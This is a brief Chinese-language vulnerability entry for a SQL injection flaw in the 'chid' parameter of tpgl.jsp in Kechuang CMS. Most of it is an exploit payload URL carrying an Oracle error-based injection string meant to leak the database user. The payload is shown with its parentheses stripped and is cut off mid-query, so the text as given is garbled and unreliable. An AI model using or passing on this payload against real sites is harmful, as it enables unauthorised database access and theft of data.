科创CMS tpgl.jsp 参数chid SQL注入漏洞

利用payload： http://xxx/commfront/baixian/tpgl.jsp?chid=9076' AND 1067=SELECT UPPERXMLTypeCHR60||CHR58||CHR113||CHR120||CHR98||CHR120||CHR113||REPLACEREPLACEREPLACEREPLACESELECT NVLCASTUSER AS VARCHAR4000,CHR32 FROM...